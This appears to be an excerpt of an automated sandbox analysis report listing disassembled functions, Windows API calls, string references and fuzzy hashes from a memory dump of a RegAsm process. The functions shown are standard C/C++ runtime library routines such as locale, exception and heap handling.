Opcode Fuzzy Hash: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction Fuzzy Hash: 4AF0FC3A3003045FEB145F36DC816BABB95FF81758F15442EFD0647680D6755C82D714

Function 00414128 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0B6: EnterCriticalSection.KERNEL32(?,?,00412ECC,00000000,00432B68,0000000C,00412E93,0000000C,?,004140B7,0000000C,?,004152C9,00000001,00000364,?), ref: 0040E0C5

EnumSystemLocalesW.KERNEL32(0041411B,00000001,00432BE8,0000000C,0041454A,00000000), ref: 00414160

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction ID: bc8c9cdb39ea7b6907bdcd078d42f788ce3f3be240e1371db2048b296ab99c2e
Opcode Fuzzy Hash: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction Fuzzy Hash: FBF04F72A04204DFD710EF99E842B9C77B0FB84724F10412BF411EB2E1CBB959409B58

Function 0041E6A4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E5FD,00000001,45F1B473,?,?,0041EE68,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6DB

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction ID: f4de27644733dcfc8870d4860b87f459398b730b02dc09fbb697d88a70ba3928
Opcode Fuzzy Hash: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction Fuzzy Hash: 2FF0EC3930024597CB149F36D8457AABF55EFC1714B97405AEE068B290C6759883C754

Function 0041464E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A37,?,20001004,00000000,00000002,?,?,00412039), ref: 00414682

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: c8c0b9562f9231183dee5b7a6e52053c98a93abb6350c4165c74df5b9bb5bc08
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: D9E04831540118B7CF122F61DC04EEE7F15FF95751F064116FC0566161C7399961A69D

Function 00407C53 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C5F,0040727A), ref: 00407C58

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction ID: 3c64f4b928e2e8a9299ff9da9a038668c79c2f648c86c238da55c8401a5bab25
Opcode Fuzzy Hash: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction Fuzzy Hash:

Function 0041EFC8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFC8

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 00404B10 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B3C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B59
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B7D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BA8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C6F
__Getctype.LIBCPMT ref: 00404C86
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D68
std::_Facet_Register.LIBCPMT ref: 00404D6E

Strings

bad locale name, xrefs: 00404D88

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction ID: 6e9f63e8d2ea1b6a4942e0921d9002d8c0fd89e6bfff9ad2541224c8a884b4bc
Opcode Fuzzy Hash: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction Fuzzy Hash: D56191B19047408BE710DF65D981B5BB7E4AFD4304F05483EF989A7392E738E948CB5A

Function 0040A988 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAA7
___TypeMatch.LIBVCRUNTIME ref: 0040ABB5
_UnwindNestedFrames.LIBCMT ref: 0040AD07
CallUnexpected.LIBVCRUNTIME ref: 0040AD22

Strings

csm, xrefs: 0040AA32
hqB, xrefs: 0040AA9E
csm, xrefs: 0040A9C5
csm, xrefs: 0040AADE

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction ID: 60820d6e0ecca0eb9fd5676567882ca170ad0f0461b4efe27468591c46910b05
Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction Fuzzy Hash: D1B177719003099FDF24DFA5C9809AFB7B5FF14304B15456AE8017B282D339EA61CF9A

Function 00422D30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042484F), ref: 00422D49

Strings

log, xrefs: 00422DA6, 00422DB5
log10, xrefs: 00422D8B, 00422D9A
acos, xrefs: 00422E7F
sqrt, xrefs: 00422E88
pow, xrefs: 00422DE7, 00422E91, 00422EDE
exp, xrefs: 00422DC8, 00422E2D
asin, xrefs: 00422E76

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction ID: c72ee430fc5992e789082aa674a62eb4bc159944c4a08777ca012a565c4a57b4
Opcode Fuzzy Hash: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction Fuzzy Hash: C2515F71B0062AEBCF108F59FA481AE7BB0FB05304FD24157D891A7264CBBD8925DB5E

Function 0040717D Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407183
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00407191
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071A2
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071B3

Strings

kernel32.dll, xrefs: 0040717E
GetTempPath2W, xrefs: 004071A8
GetSystemTimePreciseAsFileTime, xrefs: 00407197
GetCurrentPackageId, xrefs: 0040718B

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424315 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00C6CBE8,00C6CBE8,?,7FFFFFFF,?,004245E5,00C6CBE8,00C6CBE8,?,00C6CBE8,?,?,?,?,00C6CBE8,?), ref: 004243BB
__alloca_probe_16.LIBCMT ref: 00424476
__alloca_probe_16.LIBCMT ref: 00424505
__freea.LIBCMT ref: 00424550
__freea.LIBCMT ref: 00424556
__freea.LIBCMT ref: 0042458C
__freea.LIBCMT ref: 00424592
__freea.LIBCMT ref: 004245A2

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction ID: 2268128186bf180321159b17a5804e3cf269d1f4a161c5de96289f76b50a9a64
Opcode Fuzzy Hash: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction Fuzzy Hash: 55711872B00225ABDF20AF94AC41BAF77A5DFC9714FA4001BEA54A7381D73CDC818769

Function 004142F1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F3E50315,?,004143FE,004038D3,?,?,00000000), ref: 004143B2

Strings

api-ms-, xrefs: 00414348
ext-ms-, xrefs: 0041435C

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 29acd09180d048b520d34109221675969bd24e1d04ac4f63b004638bf800aa58
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9A210572B01218EBCB219B61EC45FDB3758AF81765F250222ED26A7380D738ED41C6D8

Function 00422220 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction ID: 0fa8f66f13a9205f03f3c964acb7b0f3d35d0cf0561fe90a84cb6ac065f7fb8a
Opcode Fuzzy Hash: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction Fuzzy Hash: 2FB1FA70B00265BFDB11DF59D980BAE7BB1BF85304F54815AE400AB392C7F99D42CB69

Function 0040A61A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A611,00408D4A,00407CA3), ref: 0040A628
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A636
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A64F
SetLastError.KERNEL32(00000000,0040A611,00408D4A,00407CA3), ref: 0040A6A1

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction ID: 17c3b720e5989fb0f4645250ee9d2db9be2b1969e3f2a356d50bd165ba2ebccc
Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction Fuzzy Hash: 4C01D2322083111EE62836B5BC456672678DB21378734023FF114B22E1EF7F1C11558D

Function 004114B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F3E50315,?,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 004114ED
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004114FF
FreeLibrary.KERNEL32(00000000,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 00411521

Strings

CorExitProcess, xrefs: 004114F7
mscoree.dll, xrefs: 004114E6

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction ID: 1c3cb0f38f93fbefe2a6f9ddff53ce04e6b84d498977bd807167e5d34d417036
Opcode Fuzzy Hash: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction Fuzzy Hash: 3801A231B40625FFDB218F50DC09BBEBBB9FB44B15F400526E912A22A0DB789D00CA98

Function 00418EA1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F28
__alloca_probe_16.LIBCMT ref: 00418FE9
__freea.LIBCMT ref: 00419050

Part of subcall function 00415416: HeapAlloc.KERNEL32(00000000,?,?,?,0040743B,?,?,004038D3,0000000C), ref: 00415448

__freea.LIBCMT ref: 00419065
__freea.LIBCMT ref: 00419075

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction ID: 70ac7dc22d859429bcfaf21a5452dbaba508fd75fda8d3d1cad1bcbaee3c79d9
Opcode Fuzzy Hash: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction Fuzzy Hash: CE51C872600216AFEB249F65CC41EFB3AAAEF48754B15012EFD08D7250EB39DC918769

Function 00405A19 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A20
std::_Lockit::_Lockit.LIBCPMT ref: 00405A2A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A64
std::_Facet_Register.LIBCPMT ref: 00405A7B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405A9B

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction ID: aa6d00897e01abd1bad4c0c36b67e0d55590054934450fdc9fe3478e464ff2ad
Opcode Fuzzy Hash: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction Fuzzy Hash: A001AD71A00A16CBCB05EB658881AAF7761EF84324F24052EF411BB3D2CF3C9E058F89

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::eofbit set, xrefs: 00401F46
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62, 00401F41

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction ID: d02687490f24597757631495c4e1f09aa39ba096523de16938e047820cfe1a48
Opcode Fuzzy Hash: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction Fuzzy Hash: 7B1124B2910715ABC710DF58D801B96B3E8AF08310F14853FF954E7291F778A844CBA9

Function 0040B762 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B76F
GetLastError.KERNEL32(?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B66D), ref: 0040B779
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A583), ref: 0040B7A1

Strings

api-ms-, xrefs: 0040B786

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 6663bac76f2ed2691183a1b60790d81093b85d379b5950931f3594d96b826320
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 95E01A34384208BFEF605B61EC06F5A3E64AB80B85FA04031FA0DE91E1E779A96195CC

Function 004164B2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F3E50315,00000000,00000000,0040BDA8), ref: 00416515

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416770
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167B8
GetLastError.KERNEL32 ref: 0041685B

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction ID: 23b960d84f86169114bff6dd91ebd8bfb000f40d43b919249b886c4f1d777fdd
Opcode Fuzzy Hash: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction Fuzzy Hash: 57D17975E002589FCB11DFA8D880AEDBBB5FF48304F19452AE866E7341D734E882CB54

Function 0040A731 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A7F8
___AdjustPointer.LIBCMT ref: 0040A81B
___AdjustPointer.LIBCMT ref: 0040A8B7

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 563ab20b51bfab9fbe5384d5980a8cd95d5d08f0ac2ebead566dcb8f0746e7f3
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 8E51CF72A003069FEB29AF11C941B7A77B4EF04314F14853FE8056B2D1E739E862C79A

Function 0041B497 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

GetLastError.KERNEL32 ref: 0041B4FB
__dosmaperr.LIBCMT ref: 0041B502
GetLastError.KERNEL32(?,?,?,?), ref: 0041B53C
__dosmaperr.LIBCMT ref: 0041B543

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: e5a019830a3c5c962b54c78c2afe39edf9115806d1ecbdc6188aeecc851efa14
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3E21B371600615BFDB20AF6688809ABB7A9FF04368710C52FF91997251D778EC9087E8

Function 00410892 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: 3ec36e4c3c4c4b3940ca693e254ce5ca1d14e98f6d28ba957a4fd44e2fb4f4c4
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: E621D7B1210205AFEB20AF62CC609AB7768BF40368710452BF959D7252D7B8ECD087A8

Function 0041C42D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C435

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C46D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C48D

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: 0fd12c7dda382d3999d10f706f970f90d8e04c4becb4264e138dc4c2bd032ff0
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 4F11C4B6605515BFA72127B25CDACFF6D5CDE89398710402BF901D2102EA3CDD8295BD

Function 004241D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000), ref: 004241F0
GetLastError.KERNEL32(?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8,?,00416E6D,?), ref: 004241FC

Part of subcall function 004241C2: CloseHandle.KERNEL32(FFFFFFFE,0042420C,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8), ref: 004241D2

___initconout.LIBCMT ref: 0042420C

Part of subcall function 00424184: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241B3,00421C1F,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424197

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424221

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

